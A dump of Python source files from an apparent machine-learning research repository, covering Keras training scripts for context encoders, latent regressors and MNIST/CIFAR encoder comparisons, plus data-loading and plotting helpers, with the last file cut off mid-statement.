    """Zero out one random mask_height x mask_width patch per image.

    Args:
        imgs: batch of images, shape (N, img_rows, img_cols, channels).

    Returns:
        (masked_imgs, missing_parts, (y1, y2, x1, x2)): images with the patch
        zeroed, the removed patches themselves, and per-image patch co-ordinates.
    """
    # Randomly choose co-ordinates for the masking of each image in imgs
    y1 = np.random.randint(0, img_rows - mask_height, imgs.shape[0])
    y2 = y1 + mask_height
    # Bug fix: the horizontal range must be bounded by the image *width*
    # (img_cols), not its height; the original only worked because MNIST
    # images are square.
    x1 = np.random.randint(0, img_cols - mask_width, imgs.shape[0])
    x2 = x1 + mask_width
    # Empty matrix for masked images
    masked_imgs = np.empty_like(imgs)
    # Empty array for masks
    missing_parts = np.empty((imgs.shape[0], mask_height, mask_width, channels))
    # Loop through all images
    for i, img in enumerate(imgs):
        # Copy full image to masked image
        masked_img = img.copy()
        # Determine co-ordinates to be masked for this particular image
        _y1, _y2, _x1, _x2 = y1[i], y2[i], x1[i], x2[i]
        # Save mask in separate array
        missing_parts[i] = masked_img[_y1:_y2, _x1:_x2, :].copy()
        # Remove mask from full image
        masked_img[_y1:_y2, _x1:_x2, :] = 0
        # Save masked image
        masked_imgs[i] = masked_img
    return masked_imgs, missing_parts, (y1, y2, x1, x2)
# =====================================
# Instantiate & compile models
# =====================================
# Instantiate models
encoder = encoder_model()
generator = context_generator_model(missing_shape)
context_generator = autoencoder_model(encoder, generator)
discriminator = context_discriminator_model(missing_shape)
# Specify optimizer for models
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile models
# NOTE(review): context_generator is compiled but never trained directly below;
# training goes through context_encoder — confirm whether this compile is needed.
context_generator.compile(loss=['binary_crossentropy'], optimizer=optimizer)
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
# Define context encoder model: masked image -> generated patch + discriminator verdict
masked_img = Input(shape=img_shape)
enc_img = encoder(masked_img)
gen_mask = generator(enc_img)
validity = discriminator(gen_mask)
context_encoder = Model(masked_img, [gen_mask, validity])
# Compile model with the discriminator frozen (standard GAN pattern: the
# discriminator was compiled above, so its own updates are unaffected)
discriminator.trainable = False
context_encoder.compile(loss=['mse', 'binary_crossentropy'],optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
epoch_save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
    # Print current epoch number
    print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
    # Set epoch losses to zero
    d_epoch_loss_sum = 0
    g_epoch_loss_sum = 0
    d_acc = 0
    # Shuffle training set.
    # Bug fix: np.random.randint samples indices *with replacement*, so roughly
    # a third of the training set was skipped each epoch; use a true permutation.
    new_permutation = np.random.permutation(X_train.shape[0])
    X_train = X_train[new_permutation]
    # Train on all batches
    for batch in range(num_batches):
        # Labels for supervised training
        valid = np.ones((batch_size, 1))
        fake = np.zeros((batch_size, 1))
        # ---------------------
        #  Train Discriminator
        # ---------------------
        # Select next batch of images from training set and encode
        imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
        masked_imgs, missing_piece, _ = mask_randomly(imgs)
        # Generate a half batch of new images
        gen_missing_piece = generator.predict(encoder.predict(masked_imgs))
        # Train the discriminator on real and generated patches
        d_loss_real = discriminator.train_on_batch(missing_piece, valid)
        d_loss_fake = discriminator.train_on_batch(gen_missing_piece, fake)
        d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
        # Record discriminator batch loss details
        d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
        d_epoch_loss_sum += d_loss[0]
        d_acc += d_loss[1]
        # ---------------------
        # Train Generator
        # ---------------------
        # Train the generator
        g_loss = context_encoder.train_on_batch(masked_imgs, [missing_piece, valid])
        # Record generator batch loss details.
        # Bug fix: these were never recorded, so the generator curves in the
        # saved loss plots were identically zero.
        g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss[0]
        g_epoch_loss_sum += g_loss[0]
        # Print progress
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
                                                                                      d_loss[0], 100 * d_loss[1],
                                                                                      g_loss[0]))
    # Record epoch loss data
    d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
    d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
    # If at save interval, save generated image samples
    if epoch % epoch_save_interval == 0:
        # Select a random half batch of images
        idx = np.random.randint(0, X_train.shape[0], 6)
        imgs = X_train[idx]
        sample_images(image_path, epoch, imgs)
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualizations
# =====================================
# Save loss curves (per-batch and per-epoch) for discriminator and generator
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,471 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_lr_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.optimizers import Adam
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_cifar10
from functions.visualization_funcs import save_reconstructions, plot_train_loss
from cifar10_models import deterministic_encoder_model, generator_model
from common_models.common_models import latent_reconstructor_model
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)  # CIFAR-10 RGB image shape
latent_dim = 64  # dimensionality of the latent code the regressor recovers
num_classes = 10
image_path = 'Images/cifar10_lr'  # prefix for saved figures
model_path = 'Models/cifar10_lr'  # prefix for saved model weights
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# The latent regressor trains on random codes, not images: the model is fit
# with z as both input and target further below.
z_train = np.random.normal(size=(X_train.shape[0], latent_dim))
z_test = np.random.normal(size=(X_test.shape[0], latent_dim))
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models: the generator is a pretrained (frozen) BiGAN generator,
# so only the encoder's weights are updated during training.
# NOTE(review): latent_reconstructor_model presumably composes generator then
# encoder (z -> G(z) -> E(G(z))) — confirm in common_models.
encoder = deterministic_encoder_model()
generator = generator_model()
generator.load_weights('Models/cifar10_bigan_determ_generator.h5')
generator.trainable = False
latent_regressor = latent_reconstructor_model(generator, encoder)
# Specify optimizer (DCGAN-style Adam settings)
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile latent regressor: MSE between the input code and the recovered code
latent_regressor.compile(optimizer=optimizer, loss='mse')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
patience = 5  # epochs of no val_loss improvement before stopping
# Specify training stopping criterion; best-val-loss weights are checkpointed
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                   mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model: input and target are both the sampled latent codes, since the
# composite reconstructs z through the frozen generator.
history = latent_regressor.fit(z_train, z_train,
                               epochs=epochs,
                               batch_size=batch_size,
                               shuffle=True,
                               validation_data=(z_test, z_test),
                               callbacks=callbacks,
                               verbose=1)
# Replace current encoder and decoder models with those from the saved best
# checkpoint: rebuilding the composite and loading its weights also populates
# the fresh `encoder` instance used below.
decoder = generator_model()
encoder = deterministic_encoder_model()
latent_reconstructor = latent_reconstructor_model(decoder, encoder)
latent_reconstructor.load_weights(model_path + '.h5')
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualization
# =====================================
# Save reconstructions of test images using the frozen BiGAN generator and the
# best-checkpoint encoder
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot training curves
plot_train_loss(image_path, history)
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,472 | davidhayes3/ME-Project | refs/heads/master | /functions/data_funcs.py | import numpy as np
from keras.datasets import mnist, cifar10, cifar100
# Function to rescale images
def rescale_image(image, image_range=(0, 1)):
    """Map an image from the given normalized range back to pixel values [0, 255].

    Args:
        image: Scalar or array of values lying in `image_range`.
        image_range: Either (0, 1) or (-1, 1); the range `image` currently uses.

    Returns:
        The rescaled image (returned unchanged if `image_range` is unrecognized).
    """
    # BUG FIX: the original compared with `is` (object identity) against tuple
    # literals, which is False for freshly-built tuples, so neither branch ever
    # ran and the image was returned unscaled. Equality is the correct test.
    if image_range == (0, 1):
        image *= 255
    elif image_range == (-1, 1):
        image = 127.5 * image + 127.5
    return image
# Function to pre-process data
def preprocess_data(data, gan=False, color=False):
    """Scale integer pixel data to a float range and add a channel axis if needed.

    Args:
        data: uint8 image array, shape (N, H, W) for grayscale or (N, H, W, C)
            for color images.
        gan: If False, scale to [0, 1]; if True, scale to [-1, 1] (tanh/GAN
            convention). Non-bool values are rejected with a warning, matching
            the original behavior.
        color: If True, `data` already carries a channel axis; otherwise a
            trailing channel axis is appended.

    Returns:
        float32 array, shape (N, H, W, 1) when color=False, else unchanged shape.
    """
    if not isinstance(gan, bool):
        # Preserve original best-effort behavior: warn and leave data unscaled.
        print('Incorrect range of values requested')
    elif gan:
        data = (data.astype(np.float32) - 127.5) / 127.5
    else:
        data = data.astype(np.float32) / 255.
    if not color:
        # Grayscale (N, H, W) -> (N, H, W, 1) so conv layers see a channel dim.
        data = np.expand_dims(data, axis=3)
    return data
# Function to load and pre-process MNIST dataset
def get_mnist(gan=False):
    """Load MNIST and return preprocessed ((X_train, y_train), (X_test, y_test)).

    `gan` selects the pixel range: False -> [0, 1], True -> [-1, 1].
    """
    (train_x, train_y), (test_x, test_y) = mnist.load_data()
    train_x, test_x = (preprocess_data(split, gan) for split in (train_x, test_x))
    return (train_x, train_y), (test_x, test_y)
# Function to load and pre-process CIFAR10 dataset
def get_cifar10(gan=False):
    """Load CIFAR-10 and return preprocessed ((X_train, y_train), (X_test, y_test)).

    `gan` selects the pixel range: False -> [0, 1], True -> [-1, 1].
    """
    (raw_train, y_train), (raw_test, y_test) = cifar10.load_data()
    prep = lambda imgs: preprocess_data(imgs, gan, color=True)
    return (prep(raw_train), y_train), (prep(raw_test), y_test)
# Function to load and pre-process CIFAR100 dataset
def get_cifar100(range=(0,1)):
    """Load CIFAR-100 and return preprocessed ((X_train, y_train), (X_test, y_test)).

    Args:
        range: Target pixel range, (0, 1) or (-1, 1). (Parameter name kept for
            backward compatibility even though it shadows the builtin.)
    """
    (X_train, y_train), (X_test, y_test) = cifar100.load_data()
    # BUG FIX: the original passed the `range` tuple as preprocess_data's boolean
    # `gan` flag (so pixels were never scaled) and omitted color=True (so a
    # spurious 5th axis was appended to the already 4-D color images).
    gan = range == (-1, 1)
    X_train = preprocess_data(X_train, gan, color=True)
    X_test = preprocess_data(X_test, gan, color=True)
    return (X_train, y_train), (X_test, y_test)
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,473 | davidhayes3/ME-Project | refs/heads/master | /functions/visualization_funcs.py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
import math
import matplotlib.gridspec as gridspec
# Function to plot training accuracy curves
def plot_train_accuracy(path, history):
    """Plot train/validation accuracy per epoch and save to <path>_train_acc.png."""
    hist = history.history
    plt.figure()
    for series in ('acc', 'val_acc'):
        plt.plot(hist[series])
    plt.title('Model Accuracy')
    plt.ylabel('Accuracy (%)')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Validation'], loc='lower right')
    plt.savefig(path + '_train_acc.png')
    plt.show()
# Function to plot training loss curves
def plot_train_loss(path, history):
    """Plot train/validation loss per epoch and save to <path>_train_loss.png."""
    hist = history.history
    plt.figure()
    for series in ('loss', 'val_loss'):
        plt.plot(hist[series])
    plt.title('Model Loss')
    plt.ylabel('Loss')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Validation'], loc='upper right')
    plt.savefig(path + '_train_loss.png')
    plt.show()
# Function to plot batch loss curves for generator and discriminator loss
def plot_gan_batch_loss(path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory):
    """Plot per-batch discriminator/generator losses and save to <path>_batchloss.png."""
    xs = np.arange(1, epochs * num_batches + 1)
    plt.figure()
    plt.plot(xs, d_batch_loss_trajectory, 'b-', xs, g_batch_loss_trajectory, 'r-')
    plt.legend(['Discriminator', 'Generator'], loc='upper right')
    plt.xlabel('Batch Number')
    plt.ylabel('Loss')
    plt.savefig(path + '_batchloss.png')
    plt.show()
# Function to plot epoch loss curves for g and d
def plot_gan_epoch_loss(path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory):
    """Plot per-epoch average d/g minibatch losses and save to <path>_epochloss.png."""
    xs = np.arange(1, epochs + 1)
    plt.figure()
    plt.plot(xs, d_epoch_loss_trajectory, 'b-', xs, g_epoch_loss_trajectory, 'r-')
    plt.legend(['Discriminator', 'Generator'], loc='upper right')
    plt.xlabel('Epoch Number')
    plt.ylabel('Average Minibatch Loss')
    # NOTE: unlike plot_gan_batch_loss, this figure is saved but never shown.
    plt.savefig(path + '_epochloss.png')
# Function to plot discriminator accuracy over epochs
def plot_discriminator_acc(path, epochs, d_acc_trajectory):
    """Plot discriminator accuracy per epoch and save to <path>_discriminator_acc.png."""
    plt.figure()
    plt.plot(np.arange(1, epochs + 1), d_acc_trajectory)
    plt.xlabel('Epoch Number')
    plt.ylabel('Accuracy')
    plt.savefig(path + '_discriminator_acc.png')
# Function to plot reconstructions of test set examples
def save_reconstructions(path, num_classes, test_data, test_labels, generator, encoder, img_rows, img_cols, channels,
                         color=True, num_recons_per_class=10):
    """Save a grid of test-set reconstructions (one row per class) to <path>_recons.png.

    Picks the first `num_recons_per_class` examples of each class out of
    `test_labels`, reconstructs them via generator(encoder(x)), and lays the
    results out in a num_classes x num_recons_per_class grid with no spacing.
    """
    # Get initial data examples to reconstruct
    classes = np.arange(num_classes)
    test_digit_indices = np.empty(0)
    # Collect the first num_recons_per_class test indices for every class.
    for class_index in range(num_classes):
        indices = [i for i, y in enumerate(test_labels) if y == classes[class_index]]
        indices = np.asarray(indices)
        indices = indices[0:num_recons_per_class]
        test_digit_indices = np.concatenate((test_digit_indices, indices))
    # FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; the builtin
    # int is the documented replacement.
    test_digit_indices = test_digit_indices.astype(int)
    # Reconstruct the selected images: x -> encoder -> generator -> x_hat.
    X_test = test_data[test_digit_indices]
    recon_x = generator.predict(encoder.predict(X_test))
    num_rows = num_classes
    num_cols = num_recons_per_class
    plt.figure(figsize=(num_rows, num_cols))
    gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=num_recons_per_class * [1],
                           wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
    for i in range(num_rows):
        for j in range(num_cols):
            if color is True:
                im = recon_x[i * num_cols + j].reshape(img_rows, img_cols, channels)
            if color is False:
                im = recon_x[i * num_cols + j].reshape(img_rows, img_cols)
                # Grayscale colormap only needed for single-channel images.
                plt.gray()
            ax = plt.subplot(gs[i, j])
            plt.imshow(im)
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
    plt.savefig(path + '_recons.png')
# Function to save images
def save_imgs(path, gen_imgs, epoch, img_rows, img_cols, channels, color=True):
    """Save a 5x5 grid of generated images to <path>_gen_<epoch>.png."""
    rows, cols = 5, 5
    fig, axes = plt.subplots(rows, cols)
    # Walk the grid in row-major order; image k goes to cell (k // cols, k % cols).
    for idx in range(rows * cols):
        axis = axes[idx // cols, idx % cols]
        if color is True:
            axis.imshow(gen_imgs[idx].reshape(img_rows, img_cols, channels))
        elif color is False:
            axis.imshow(gen_imgs[idx].reshape(img_rows, img_cols), cmap='gray')
        axis.axis('off')
    fig.savefig(path + '_gen_%d.png' % (epoch))
    plt.close()
# Function to plot 2D latent space visualizations
def save_latent_vis(path, data, labels, encoder, num_classes, epoch=None):
    """Scatter-plot the first two latent dimensions of encoder(data), colored by
    class, and save the figure as a PNG (epoch-suffixed when `epoch` is given)."""
    latent = encoder.predict(data)
    fig = plt.figure()
    ax = fig.add_subplot(111)
    palette = cm.Spectral(np.linspace(0, 1, num_classes))
    # One scatter call per class so each gets its own color and legend label.
    for cls in range(num_classes):
        mask = labels == cls
        ax.scatter(latent[mask, 0], latent[mask, 1], color=palette[cls], label=cls, s=5)
    plt.axis('tight')
    suffix = '_latent_vis.png' if epoch is None else '_latent_vis_%d.png' % (epoch + 1)
    plt.savefig(path + suffix)
    plt.close()
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,474 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_model_comparison.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from mnist_conv_ae_models import *
from keras.callbacks import EarlyStopping, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(1330)
## Load and preprocess MNIST: scale pixels to [0, 1], reshape to
## (N, 28, 28, 1) for the conv encoder, and one-hot encode the labels.
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1))
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1))
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
## Define models
# Load encoders
# FIX: the original had `onv_ae = encoder_model()` (typo, leaving `conv_ae`
# undefined) and two incomplete assignments (`conv_bigan =` and
# `conv_latent_regressor =`) that were syntax errors.  All seven encoders share
# the same architecture, so each is an encoder_model() instance.
# TODO(review): confirm the conv_* variants were not meant to use a different
# (convolutional) model constructor.
mlp_ae = encoder_model()
conv_ae = encoder_model()
mlp_vae = encoder_model()
conv_vae = encoder_model()
mlp_bigan = encoder_model()
conv_bigan = encoder_model()
conv_latent_regressor = encoder_model()
encoders = (mlp_ae, conv_ae, mlp_vae, conv_vae, mlp_bigan, conv_bigan, conv_latent_regressor)
# FIX: `str(encoder)` yields the object's repr (e.g. '<keras.Model object at
# 0x...>'), not a model name; use an explicit name list so weights load from
# '<name>_encoder.h5' as intended.
encoder_names = ('mlp_ae', 'conv_ae', 'mlp_vae', 'conv_vae', 'mlp_bigan',
                 'conv_bigan', 'conv_latent_regressor')
for encoder, name in zip(encoders, encoder_names):
    encoder.load_weights(name + '_encoder.h5')
    encoder.trainable = False
# Load frozen pretrained encoder model
pretrained_e_frozen = encoder_model()
pretrained_e_frozen.load_weights('encoder.h5')
pretrained_e_frozen.trainable = False
# Hyperparameters and training specification shared by all classifier variants
epochs = 100
batch_size = 100
val_split = 1 / 5.  # 20% of each reduced training set held out for validation
# Specify training stop criterion (per-model checkpoints are created below)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto')
# Number of labelled examples to investigate
# NOTE(review): despite the name, `num_unlabelled` holds the *labelled*
# training-set sizes swept over below — verify against the plots' axis labels.
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 60000]
num_iterations = 5  # repetitions averaged per training-set size
# Arrays to hold the averaged test accuracy (%) of each classifier variant
classifier_pretrained_frozen_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
# Loop through each quantity of enquiry: for every labelled-set size, build,
# train and evaluate the three classifier variants num_iterations times and
# accumulate their test accuracies.
for index, num in enumerate(num_unlabelled):
    # Set each score to zero
    pretrained_frozen_score = 0
    pretrained_trainable_score = 0
    random_score = 0
    # Reduce size of training sets (first `num` examples of the shuffled MNIST
    # training split)
    reduced_x_train = x_train[0:num, :, :, :]
    reduced_y_train = y_train_one_hot[0:num, :]
    # Average classification accuracy over num_iterations readings
    for iteration in range(num_iterations):
        # Print details of no. of labelled examples and iteration number
        print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
        ## Initialize classifiers (rebuilt fresh every iteration so weights do
        ## not carry over between runs)
        # Classifier with e learned from autoencoder and frozen
        mnist_classifier_pretrained_e_frozen = classifier_e_frozen_model(pretrained_e_frozen)
        # Classifier with e learned from autoencoder and not frozen
        pretrained_e_trainable = encoder_model()
        pretrained_e_trainable.load_weights('encoder.h5')
        mnist_classifier_pretrained_e_trainable = classifier_e_trainable_model(pretrained_e_trainable)
        # Classifier with randomly initialized e
        random_e = encoder_model()
        mnist_classifier_random_e = classifier_e_trainable_model(random_e)
        # Print details of trainable and non-trainable weights of the three
        # models — only once, on the very first configuration
        if index == 0 and iteration == 0:
            # Print number of trainable and non-trainable parameters for each classifier
            trainable_count = int(
                np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.trainable_weights)]))
            non_trainable_count = int(
                np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.non_trainable_weights)]))
            print('Classifier w/ Frozen Pretrained Encoder + FC Layers')
            print('Total parameters: ' + str(trainable_count + non_trainable_count))
            # NOTE(review): 'paramseter' typo below is in the original output strings
            print('Trainable paramseter: ' + str(trainable_count))
            print('Non-trainable parameters: ' + str(non_trainable_count))
            trainable_count = int(
                np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.trainable_weights)]))
            non_trainable_count = int(
